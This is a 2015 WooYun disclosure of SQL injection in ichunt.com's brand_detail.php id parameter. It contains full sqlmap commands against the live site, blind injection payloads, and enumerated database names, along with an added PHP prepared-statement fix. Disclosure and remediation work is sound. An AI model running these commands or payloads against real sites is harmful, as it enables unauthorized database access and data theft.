
Vulnerability summary

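Bug ID: wooyun-2015-0141141

Title: SQL injection on the 猎芯网 main site

Vendor: 猎芯网

Author: 残废

Submitted: 2015-09-14 19:03

Fixed: 2015-10-29 19:04

Disclosed: 2015-10-29 19:04

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted or actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]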


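Vulnerability details

Disclosure status:

2015-09-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-10-29: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As the title says.
With the launch of 猎芯网 on July 8, this electronic-components B2B e-commerce platform aimed at small and medium-sized enterprises immediately sparked heated discussion in the industry. Its positioning and innovative operating model seem to represent another new force in the e-commerce platform industry, making it a dark horse in a chaotic e-commerce market!
Within two weeks of launch, 猎芯网 passed 10 million in transaction volume, an encouraging result that makes one want to find out what lies behind it. 《国际电子商情》 interviewed Chen Cheng, marketing director of 猎芯网, to reveal the site's appeal and the strength behind it.

Detailed description: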

http://www.ichunt.com/brand_detail.php?id=101


CanF:sqlmap CanF$ python sqlmap.py -u "http://www.ichunt.com/brand_detail.php?id=101"
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 18:42:33
[18:42:33] [INFO] using '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session' as session file
[18:42:33] [INFO] resuming injection data from session file
[18:42:33] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:42:33] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=101 AND 2490=2490
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=101 AND SLEEP(5)
---
[18:42:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:42:35] [INFO] Fetched data logged to text files under '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com'
[*] shutting down at: 18:42:35
CanF:sqlmap CanF$ python sqlmap.py -u "http://www.ichunt.com/brand_detail.php?id=101" --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 18:43:21
[18:43:22] [INFO] using '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session' as session file
[18:43:22] [INFO] resuming injection data from session file
[18:43:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:43:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=101 AND 2490=2490
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=101 AND SLEEP(5)
---
[18:43:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:43:22] [INFO] fetching database names
[18:43:22] [INFO] fetching number of databases
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': 9
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': information_schema
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': ichunt
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': icmall
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': icmao
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': lx
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': mysql
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': qbt_icmaobbs
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': test
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': xqbt_bbs
available databases [9]:
[*] ichunt
[*] icmall
[*] icmao
[*] information_schema
[*] lx
[*] mysql
[*] qbt_icmaobbs
[*] test
[*] xqbt_bbs
[18:43:22] [INFO] Fetched data logged to text files under '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com'

Proof of vulnerability:

The same two sqlmap runs shown under "Detailed description" above: the injection-point check on the id parameter and the --dbs enumeration listing 9 databases.

Fix:

You know what to do
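
One way to close the hole reported in the id parameter of brand_detail.php, shown as an added example that is not part of the original report or the vendor's code. The table and column names (brand, id, name) and the function names are hypothetical, and an in-memory SQLite database stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example: brand/id/name and both function names are hypothetical.
// SQLite in memory stands in for the MySQL back end named in the report.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE brand (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO brand (id, name) VALUES (101, 'constructed-brand')");

// Vulnerable pattern: the raw parameter is concatenated into the statement,
// so anything after the number is parsed as SQL.
function brand_vulnerable(PDO $pdo, string $rawId): array
{
    $sql = 'SELECT name FROM brand WHERE id = ' . $rawId;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: reject anything that is not a positive integer,
// then bind the value as data in a prepared statement.
function brand_hardened(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller should answer with HTTP 400
    }
    $stmt = $pdo->prepare('SELECT name FROM brand WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Inputs: the normal value, the boolean payload quoted in the report, and a
// false counterpart constructed here to show the true/false difference.
foreach (['101', '101 AND 2490=2490', '101 AND 2490=2491'] as $input) {
    printf(
        "%-20s vulnerable=%s hardened=%s\n",
        $input,
        json_encode(brand_vulnerable($pdo, $input)),
        json_encode(brand_hardened($pdo, $input))
    );
}
```

With the MySQL PDO driver, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared on the server rather than interpolated by the client library.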

Copyright notice: when reposting, please credit the source: 残废@WooYun


Vulnerability response

Vendor response:

Could not contact the vendor, or the vendor actively refused